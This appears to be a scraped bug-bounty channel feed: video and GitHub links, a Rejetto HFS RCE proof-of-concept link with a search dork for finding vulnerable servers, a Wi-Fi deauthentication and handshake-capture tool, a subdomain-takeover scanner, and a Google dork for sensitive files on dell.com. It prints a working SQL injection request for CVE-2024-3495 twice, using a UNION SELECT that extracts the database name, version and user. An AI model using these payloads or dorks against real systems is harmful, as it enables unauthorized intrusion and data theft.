This Time Based 𝗦𝗤𝗟 𝗜𝗻𝗷𝗲𝗰𝘁𝗶𝗼𝗻 on 𝐰𝐨𝐫𝐝𝐩𝐫𝐞𝐬𝐬 𝐬𝐢𝐭𝐞 worth 500$ Bounty | Bug bounty poc 🔥
https://youtu.be/UNGPdPQ28vY?si=MBuybHogJb4KJev3
https://youtu.be/UNGPdPQ28vY?si=MBuybHogJb4KJev3
YouTube
This Time Based 𝗦𝗤𝗟 𝗜𝗻𝗷𝗲𝗰𝘁𝗶𝗼𝗻 on 𝐰𝐨𝐫𝐝𝐩𝐫𝐞𝐬𝐬 𝐬𝐢𝐭𝐞 worth 500$ Bounty | Bug bounty poc 🔥
In this exciting Proof of Concept (POC), we dive deep into a real-world bug bounty worth $500, showcasing a Time-Based SQL Injection vulnerability on a WordPress site! 💥 Watch as we demonstrate step-by-step how this critical exploit works, and how it can…
🆕CVE-2024-23692:Unauthenticated RCE Flaw in Rejetto HTTP File Server
🔥New PoC:https://github.com/verylazytech/CVE-2024-23692
👇Dork:
HUNTER: web.body="HttpFileServer"&&header.server=="HFS 2.3m"
🔥New PoC:https://github.com/verylazytech/CVE-2024-23692
👇Dork:
HUNTER: web.body="HttpFileServer"&&header.server=="HFS 2.3m"
GitHub
GitHub - verylazytech/CVE-2024-23692: POC - Unauthenticated RCE Flaw in Rejetto HTTP File Server - CVE-2024-23692
POC - Unauthenticated RCE Flaw in Rejetto HTTP File Server - CVE-2024-23692 - GitHub - verylazytech/CVE-2024-23692: POC - Unauthenticated RCE Flaw in Rejetto HTTP File Server - CVE-2024-23692
❤2👍2
Easy way to find 𝐰𝐨𝐫𝐝𝐩𝐫𝐞𝐬𝐬 𝘀𝗾𝗹 𝗶𝗻𝗷𝗲𝗰𝘁𝗶𝗼𝗻 manually+CVE | bug bounty poc 🔥
https://youtu.be/V-2rz5xvw0I?si=2CtA5N0yZs6rzI9K
https://youtu.be/V-2rz5xvw0I?si=2CtA5N0yZs6rzI9K
YouTube
Easy way to find 𝐰𝐨𝐫𝐝𝐩𝐫𝐞𝐬𝐬 𝘀𝗾𝗹 𝗶𝗻𝗷𝗲𝗰𝘁𝗶𝗼𝗻 manually+CVE | bug bounty poc 🔥
In this video, we dive deep into finding WordPress SQL Injection vulnerabilities manually. Whether you're a bug bounty hunter or a cybersecurity enthusiast, you'll learn step-by-step techniques for identifying SQL injection points. We'll also cover specific…
❤4👏1
Proof of concept CVE 2024-CVE-2024-3495
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: <Host>
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 172
action=tc_csca_get_states&nonce_ajax={{nonce}}&cnt=1+or+0+union+select+concat(0x64617461626173653a,database(),0x7c76657273696f6e3a,version(),0x7c757365723a,user()),2,3--+-
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: <Host>
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 172
action=tc_csca_get_states&nonce_ajax={{nonce}}&cnt=1+or+0+union+select+concat(0x64617461626173653a,database(),0x7c76657273696f6e3a,version(),0x7c757365723a,user()),2,3--+-
Wifire: Automated Wi-Fi Scanner and Attacker
Wifire is a Python-based tool that enables Wi-Fi network scanning, deauthentication attacks, and WPA/WPA2 handshake capture. It captures WPA/WPA2 handshakes and extracts hashes for further analysis
This tool is for educational purposes and should only be used on networks that you own or have permission to test Performance: Results may vary depending on the Wi-Fi adapter and its compatibility with monitor mode and packet injection.Further Use: Captured handshakes can be analyzed using hash-cracking tools like aircrack-ng or hashcat.
https://github.com/Sheikh-Nightshader/Wifire
Wifire is a Python-based tool that enables Wi-Fi network scanning, deauthentication attacks, and WPA/WPA2 handshake capture. It captures WPA/WPA2 handshakes and extracts hashes for further analysis
This tool is for educational purposes and should only be used on networks that you own or have permission to test Performance: Results may vary depending on the Wi-Fi adapter and its compatibility with monitor mode and packet injection.Further Use: Captured handshakes can be analyzed using hash-cracking tools like aircrack-ng or hashcat.
https://github.com/Sheikh-Nightshader/Wifire
GitHub
GitHub - Sheikh-Nightshader/Wifire: Wifire: Automated Wi-Fi Scanner and Attacker. Wifire is a Python-based tool that enables Wi…
Wifire: Automated Wi-Fi Scanner and Attacker. Wifire is a Python-based tool that enables Wi-Fi network scanning, deauthentication attacks, and WPA/WPA2 handshake capture. It captures WPA/WPA2 hands...
👍1
Subowner - A Simple python based tool to check for subdomain takeovers in mass scanning. Supports, AWS, Fastly, Shopify, Azure etc.
https://github.com/ifconfig-me/subowner
https://github.com/ifconfig-me/subowner
try this google dork to find senstive files on website:
site:*.dell.com (ext:doc OR ext:docx OR ext:odt OR ext:pdf OR ext:rtf OR ext:ppt OR ext:pptx OR ext:csv OR ext:xls OR ext:xlsx OR ext:txt OR ext:xml OR ext:json OR ext:zip OR ext:rar OR ext:md OR ext:log OR ext:bak OR ext:conf OR ext:sql)
🔥11👍3👎2
T-mobile - Live bug bounty hunting on bugcrowd | live Recon
https://youtu.be/CJJoLbixidA?si=lN3tlApqIFCVgBIa
https://youtu.be/CJJoLbixidA?si=lN3tlApqIFCVgBIa
YouTube
T-mobile - Live bug bounty hunting on bugcrowd | live Recon
🌟 T-Mobile - Live Bug Bounty Hunting on Bugcrowd | Real-Time Reconnaissance Adventure! 🌟
🎯 Ready to step into the thrilling world of ethical hacking? Join us LIVE as we embark on an epic bug bounty hunt, targeting T-Mobile's assets through Bugcrowd! Watch…
🎯 Ready to step into the thrilling world of ethical hacking? Join us LIVE as we embark on an epic bug bounty hunt, targeting T-Mobile's assets through Bugcrowd! Watch…
🔥10❤4👎2
